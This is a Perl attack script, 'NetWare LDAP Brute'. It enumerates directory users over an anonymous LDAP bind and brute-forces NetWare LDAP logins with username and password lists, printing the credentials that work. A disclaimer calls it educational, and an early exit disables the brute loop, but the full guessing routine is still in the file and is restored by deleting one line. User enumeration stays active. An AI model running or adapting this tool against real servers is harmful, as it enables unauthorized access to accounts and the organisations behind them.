#!/usr/bin/perl ########################################################################## ## ## NetWare LDAP Brute by ## George Hedfors ## ## http://www.pinion.se ## ## Disclaimer: This program may only be used for educational purposes! ## Offensive parts of the script has been disabled. ## # use Switch; use Net::LDAP; $| = 1; print "NetWare LDAP Brute by George Hedfors @ Pinion\n"; print "[x] This program may only be used for educational purposes!\n"; for($i = 0; $i < @ARGV; $i++) { switch($ARGV[$i]) { case "-h" { $host = $ARGV[$i+1]; $i++; } case "-r" { $rootdn = $ARGV[$i+1]; $i++; } case "-u" { $usrs = $ARGV[$i+1]; $i++; } case "-p" { $pwds = $ARGV[$i+1]; $i++; } case "-t" { $port = $ARGV[$i+1]; $i++; } case "-s" { $ssl++; } case "-e" { $enumusr++; } case "-n" { $same++; } } } if(!$host or (!$usrs and !$enumusr)) { usage(); } if(!$port) { if($ssl) { $port = 636; } else { $port = 389; } } if($ssl) { $scheme = "ldaps"; } else { $scheme = "ldap"; } if(!$rootdn) { print "[!] No Root DN. Assuming default 'o=hq'.\n"; $rootdn = "o=hq"; } if($enumusr) { print "[*] Trying to enumerate users..."; $ldap = Net::LDAP->new($host, scheme => $scheme, port => $port) || die "\n\n[!] Unable to connect: $!\n"; $mesg = $ldap->bind(); if($mesg->code eq 0) { print " Anonymous bind worked!\n"; $mesg = $ldap->search(base => $rootdn, scope => 'one', filter => '(|(objectclass=person))' ); foreach ($mesg->entries) { if($_->exists('uid')) { $u = $_->get_value('uid'); $u =~ s/\ /\_/g; push(@uarr, $u); push(@users, lc($u)); } } foreach (@uarr) { print "[+] " . $_ . "\n"; } if(@users eq 0) { print "[!] No users enumerated.\n"; } else { print "[*] " . @uarr . " user(s) enumerated.\n"; } } else { print " failed.\n"; } } if($usrs) { if(open(IN, "< $usrs")) { while() { $_ =~ s/[\n|\r]//g; push(@users, $_); } close(IN); } else { push(@users, $usrs); } } if(!@users) { print STDERR "[!] No users, exiting.\n"; exit; } if($pwds) { if(open(IN, "< $pwds")) { while() { $_ =~ s/[\n|\r]//g; push(@passwds, $_); } close(IN); } } if(!@passwd and !$same) { print "\n[!] No passwords to try, exiting.\n"; exit; } print "\n[x] Offensive functions has been disabled!\n"; exit; print "\n[*] Starting brute...\n"; foreach $user (@users) { $ret = (); if($same) { $passwd = $user; $ret = mytry(); } if($ret ne 1) { if(@passwds) { foreach $passwd (@passwds) { mytry(); } } elsif($pwds) { $passwd = $pwds; mytry(); } } } print "\n"; if(@working gt 0) { print "[*] Valid credentials:\n"; foreach (@working) { print "[+] " . $_ . "\n"; } } exit; sub usage() { print STDERR "syntax: $0 [options]\n"; print STDERR "\t-h \n"; print STDERR "\t-t \tDefault: 389\n"; print STDERR "\t-s\t\tLDAPS. Default port change to: 636\n"; print STDERR "\t-r \tDefault: o=hq\n"; print STDERR "\t-u \n"; print STDERR "\t-p \n"; print STDERR "\t-n\t\tTry same password as username.\n"; print STDERR "\t-e\t\tEnumerate users.\n\n"; print STDERR "\tNote: Bruteforcing LDAP is slow!\n\n"; exit; } sub mytry() { print "[*] Trying " . $user . " / " . $passwd . "..."; $ldap = Net::LDAP->new($host, scheme => $scheme, port => $port) || die "\n\n[!] Unable to connect: $!\n"; if($ssl) { $ldap->start_tls(verify => "none"); } my $dn = "cn=" . $user . ", " . $rootdn; $mesg = $ldap->bind($dn, password => $passwd, port => $port ); if($mesg->code ne 0) { if($mesg->code ne 49) { print " disabled or unable to logon. Return (" . $mesg->code . ")\n"; } else { print "\n"; } return; } else { print " OK!\n"; $ldap->unbind; push(@working, $user . "/" . $passwd); return 1; } }